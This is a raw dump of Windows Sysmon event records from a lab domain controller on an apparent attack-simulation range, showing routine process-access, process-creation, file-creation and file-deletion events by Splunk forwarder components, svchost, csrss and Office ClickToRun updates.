Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB0B-607E-750B-00000000BB01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB0B-607E-750B-00000000BB01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.988{A7A01FEF-EB0B-607E-750B-00000000BB01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msolap_xl.dll2021-04-20 14:54:03.784 11241100x800000000000000063840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\System.Spatial.dll2021-04-20 14:54:03.753 11241100x800000000000000063839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmapi_xl.dll2021-04-20 14:54:03.753 11241100x800000000000000063838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.706{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmcachemgr_xl.dll2021-04-20 14:54:03.706 11241100x800000000000000063837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmtransactions_xl.dll2021-04-20 14:54:03.690 11241100x800000000000000063836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrw_xl.dll2021-04-20 14:54:03.690 11241100x800000000000000063835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dll2021-04-20 14:54:03.675 23542300x800000000000000063834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.675{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9107BD129595DAEBF79FE67383BD1636,SHA256=74AB4829D72CF69CFD26A1605E99DD085EC57C79C8E196119E1E3E2C6F8DF754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.675{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A7A83850D15CD6D590E9605EDB1462B,SHA256=91F173262C34940AFE9D091C88B8A649C7F656AC687073721BFC3D1617C9B922,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_PDF.DLL2021-04-20 14:54:03.612 11241100x800000000000000063831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXPSRV.DLL2021-04-20 14:54:03.612 11241100x800000000000000063830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:03.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE2021-04-20 14:54:03.597 11241100x800000000000000063829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\IACOM2.DLL2021-04-20 14:54:03.581 11241100x800000000000000063828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso50win32client.dll2021-04-20 14:54:03.581 11241100x800000000000000063827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:03.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE2021-04-20 14:54:03.518 11241100x800000000000000063826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msowerrelief.dll2021-04-20 14:54:03.456 10341000x800000000000000063825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.487{A7A01FEF-EB0B-607E-740B-00000000BB01}38282600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000063824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOPRIV.DLL2021-04-20 14:54:03.456 11241100x800000000000000063823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dll2021-04-20 14:54:03.456 11241100x800000000000000063822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dll2021-04-20 14:54:03.456 11241100x800000000000000063821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLMF.DLL2021-04-20 14:54:03.456 11241100x800000000000000063820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSSOAP30.DLL2021-04-20 14:54:03.456 11241100x800000000000000063819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso98win32client.dll2021-04-20 14:54:03.456 11241100x800000000000000063818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE2021-04-20 14:54:03.456 11241100x800000000000000063817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLL2021-04-20 14:54:03.456 11241100x800000000000000063816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OFFREL.DLL2021-04-20 14:54:03.394 23542300x800000000000000063815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.394{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B272D8F8B5C47513F04621179B13FA9A,SHA256=8BAD591C8C82F3FD852C809C9B4189551562F4DD5B43EC78E17C92CD14B7E01B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\TextIntelligence.dll2021-04-20 14:54:03.378 11241100x800000000000000063813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\WXPNSE.DLL2021-04-20 14:54:03.378 11241100x800000000000000063812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSLID.DLL2021-04-20 14:54:03.378 11241100x800000000000000063811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FPERSON.DLL2021-04-20 14:54:03.378 11241100x800000000000000063810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.TXT2021-04-20 14:54:03.378 11241100x800000000000000063809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:03.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE2021-04-20 14:54:03.362 11241100x800000000000000063808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLL2021-04-20 14:54:03.331 10341000x800000000000000063807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB0B-607E-740B-00000000BB01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 